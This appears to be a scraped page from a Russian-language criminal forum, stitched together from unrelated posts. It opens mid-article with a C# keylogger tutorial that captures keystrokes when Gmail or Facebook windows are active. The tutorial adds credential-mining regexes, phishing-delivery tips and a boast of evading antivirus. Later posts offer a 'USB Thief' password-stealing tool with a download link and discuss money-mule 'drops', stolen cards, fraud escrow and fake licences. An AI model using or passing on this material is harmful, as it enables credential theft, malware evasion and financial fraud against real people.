увеличиваю шансы получения учетных данных. Вторая версия кода: 1. while (true) 2. { 3. IntPtr handle = GetForegroundWindow(); 4. if (GetWindowText(handle, buff, chars) > 0) 5. { 6. string line = buff.ToString(); 7. if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up ")) 8. { 9. //проверка клавиатуры 10. } 11. } 12. Thread.Sleep(100); 13. } Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры. Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail. Еще более умный кейлогер Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь. Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям: 1. //Ищем почтовый адрес 2. ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$ 3. 4. 5. //Ищем пароль 6. (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z]) Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли. Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения. Для C# это выглядит так: 1. Regex re = new Regex(@"^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$"); 2. Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])"); 3. string email = "Oded.awask@gmail.com"; 4. string pass = "abcde3FG"; 5. Match result = re.Match(email); 6. Match result2 = re2.Match(pass); Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов. Бесплатно и полностью не обнаружим В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут. Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения. Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ? Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось. В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.
-
1 баллПродавец попросил оставить отзыв на этой площадке Оставляю, ликвидировал мне фирму без проблем, хотя она была очень проблемная, да еще и взял копейки Спасибо.
-
1 балл
-
1 балл
-
1 балл
-
1 баллХотел выразить благодарность Артему Сотрудничаю с ним уже около полугода , ни разу не было задержек и товар всегда приходит качественный
-
1 баллпервому дропу пришли: 3 - 5000 купюр 3 - 1000 купюр По результатам размена отпишусь позже (день-два) До человека в Беларуси пока посылка не дошла.
-
1 баллсегодня с утра произошел не приятный инцедент - получил карту и пин код приложенный к ней оказался неверным, прошу разобраться
-
1 балл
-
1 баллАйфон пришееееееееел, я уж думал кинули, а нет, доставку обещали 9дней , а курьер позвонил спустя 13 , но он все таки пришел!!!!!!!!!! Выкладываю фото как обещал, надеюсь в дальнем сделаешь скидку
-
1 баллТема открыта! Давно такого не видел, схема авторская , не паблик , можно вырулить чуть меньше 100 за месяц , но можно друзьям по франшизе продавать ее с учетом 50\50
-
1 баллНадеюсь мои устройства не заражены
-
1 балл
-
1 балл
-
1 баллBIG Thanks! Гарант провел сделку , без задержек и без нервов. Спасибо
-
1 баллБиллингует падла он сколь сильно.Провел эксперемент,выключил телефон,поднес к колонке идет сигнал.Делаем ребята выводы
-
1 баллSignal – Private Messenger – бесплатная программа с открытым кодом для iPhone, которая реализует сквозное шифрование коммуникаций. С помощью Signal для iPhone, можно безопасно разговаривать, делать видеозвонки, обмениваться сообщениями и файлами. Signal использует список контактов смартфона, но передача данных требует подключения обоих собеседников к интернету. Таким образом, не нужно платить оператору сотовой связи за SMS и MMS. Установка Signal – Private Messenger на ваш iPhone Шаг 1. Скачайте и установите Signal – Private Messenger На вашем устройстве iOS войдите в App Store и ищите по слову «Signal». Выберите приложение «Signal – Private Messenger» от Open Whisper Systems. Нажмите «Accept», чтобы скачать приложение и принять условия магазина iTunes. Приложение будет скачано и установлено автоматически. Нажмите «Open», чтобы запустить приложение. Шаг 2. Зарегистрируйте и подтвердите ваш телефонный номер Вы увидите такой экран: Введите номер своего мобильного телефона и нажмите «Verify This Device». Для подтверждения вам придет SMS-сообщение с шестизначным кодом. Введите эти цифры в соответствующее поле. Если не получается принять SMS-сообщение, можно подтвердить свой номер с помощью телефонного звонка. Нажмите «Submit Verification Code». Использование программы Чтобы использовать Signal, ваш собеседник должен иметь либо эту же программу, либо (для Android) TextSecure или RedPhone. Если вы попробуете позвонить или отправить сообщение кому-нибудь, у кого не установлена ни одна из упомянутых программ, приложение спросит, надо ли отправить вашему другу SMS-приглашение, но звонить или отправить сообщение из Signal вы не сможете. Чтобы начать, нажмите кнопку «+». Вы увидите список контактов людей, которые уже установили Signal, TextSecure или RedPhone. Можете звонить им или отправлять сообщения. Как сделать зашифрованный звонок Нажмите кнопку с изображением телефона рядом с контактом нужного человека. Когда связь установлена, каждому собеседнику будет показана случайная пара слов. Это позволит подтвердить свою личность и шифровальные ключи, используемые для связи (верификация ключей). Самый надежный способ проверить личность собеседника – использовать для проверки слов альтернативный канал связи. Если вы знаете собеседника по голосу, можете прочитать ему ключевые слова вслух (хотя наиболее упорные злоумышленники способны обойти и такую защиту). Главное – убедиться, что слова совпадают как у вас, так и у вашего собеседника. Как отправить зашифрованное сообщение Signal может отправить любой текст, изображение или видеофайл в зашифрованном виде напрямую вашему адресату. Просто найдите нужный номер в списке контактов и отправьте сообщение. Можно зашифровать сообщение и для группы людей. Откройте список контактов, нажмите значок группового чата в правом верхнем углу и создайте новую группу. Сквозное шифрование позволяет Signal – Private Messenger заметно повысить уровень безопасности при обмене звонками и сообщениями.
-
1 балл"Почта России" собирается построить по всей стране сеть современных логистических почтовых центров для приема и отправки международных посылок. Как пишет Российская газета, такие узлы в аэропортах сократят сроки доставки отправлений адресатам, считает замгендиректора "Почты России" Алексей Скатин. "Почтовые центры от Санкт-Петербурга до Хабаровска покроют 80 процентов рынка", - поделился планами Скатин, добавив, что один из хабов уже работает в районе Московского аэропорта Внуково. В этом году "Почта России" планирует его дооснастить. "В четвёртом квартале мы выходим на стройплощадку в Казани, также планируем построить почтовые хабы в Екатеринбурге, в Новосибирске, в Хабаровске, в Ростове-на-Дону", - уточнил Скатин. Узлы будут размещаться в зоне аэропортов, куда в основном доставляются международные посылки. "Совместно с кoллегами из Федеральной таможенной службы мы можем оснастить почтовые центры таким оборудованием, которое позволит обрабатывать почтовые отправления в разы быстрее. Это очень важно, поскольку объемы таких отправлений постоянно растут", - подчеркнул замгендиректора "Почты России".
-
1 балл
-
1 баллТут панел классической версии, на новой панели я такой кнопки не нашел Пытался включить классическую панель, ни чего не выходит(Бро как быть?
-
1 балл
-
1 баллCarder's history [book] Как я и обещал, буду выкладывать по частям свою книгу. Думаю многим понравится каждый день заходить в данную тему и читать новый раздел большого рассказа. Надеюсь Вам понравится. Буду принимать во внимание любую критику (Адекватную и обоснованную). Решил постить не укороченную версию, но по частям. Бумажный вариант выйдет после того как будет опубликована первая половина книги и при условии что она понравится многим. Ожидаемое количество публикаций: 25. Вариант кстати сырой. Я пишу только когда есть идея, но мог где-то допустить грамматическую ошибку. Потому извиняюсь. Сам сюжет я проверял. Возможно некоторым он покажется затянутым, но это только тем кто не любит читать Публиковать буду стараться один раз на 1-2 сутки. Просто нужно проверить сюжет и по возможности проверить ошибки. А у меня еще работа есть. Так что не пинайте за опоздания. Всем спасибо.
-
1 баллПробовали? Просто реально за 1,5 года собственного дела причем по регистрации других ИП и юрлиц со взятками ни разу не пришлось столкнуться, поэтому меня так и удивляет поголовная ссылка на это и утверждение, что бизнес кто-то давит.....
-
1 балл
-
1 баллПри упрощенной системе наогообложения нужно вести "книгу учета доходов и расходов". Она есть специальная для тех, кто на упрощенке. И она все-таки в налоговую сдается (если ведется на бумаге, то вооще в начале года, чтобы налоговая свой штамп на прошивке поставила. Если ведется в электронном виде, то в конце года). Если хотите попробовать сами, советую скачать программу "Налогоплательщик ЮЛ" с официального сайта налоговой инспекции.
-
1 баллqwqwqw, бро, ещё вопрос будет один. расскажи плз за лимиты дневные и недельные и про то как верифицируеться акк энтро.
-
1 балл
-
1 баллкак конфетку у ребенка USB Thief - программа для скрытого копирования установленных на компьютере паролей .Принцип работы очень прост,нужно всего лишь распаковать архив, скопировать файлы из папки USBThief на любой USB носитель и вставить в компьютер \"жертвы\". Важно! Скопировать все файлы в главную директорию USB носителя! Никаких папок создавать не надо! В папке \"dump\" Вы увидите пароли. http://depositfiles.com/ru/files/3968040
-
1 балл
-
1 баллпечати и флешки это пол беды, как их вычислили? они были не делетантами
-
1 балл
-
1 балл
-
1 балл
-
1 баллДва профессиональных квартирных вора из Грузии задержаны с поличным на севере российской столицы, сообщил в воскресенье "Интерфаксу" источник в правоохранительных органах. По его словам, в субботу днем в милицию позвонил жилец одного из домов по улице Всеволода Вишнеского, который заявил, что в его квартиру проникли неизвестные. "Для проверки сообщения на место происшествия выехал наряд, - рассказал источник. - И действительно - в квартире москвича были задержаны двое приезжих из Грузии, 29 и 35 лет. У них изъяты несколько связок ключей от замков различных фирм, отмычки, универсальные ключи от домофонов, сумки со слесарными инструментами и химическими веществами, а так же похищенные из квартиры деньги и ценности". "Как выяснилось, 27-летний хозяин квартиры - специалист по установке современных систем сигнализации. Он оборудовал свою квартиру незаметными системами защиты, и сообщение о попытке проникновения пришло ему на мобильный телефон в ту самую секунду, когда воры вскрыли дверь", - отметил собеседник агентства. В настоящее время задержанные проверяются на причастность к другим подобным преступлениям: сразу после задержания они признались, что приехали в Москву месяц назад, и все это время занимались квартирными кражами.
-
1 баллНу или просто параноик))) Знакомый перемещается уже года два по подобным правам, только на оригинальном бланке, и по Столице, и по окрестным областям, и на юге был пару раз... Вроде без проблем, не придрались не разу, а тормозят частенько...
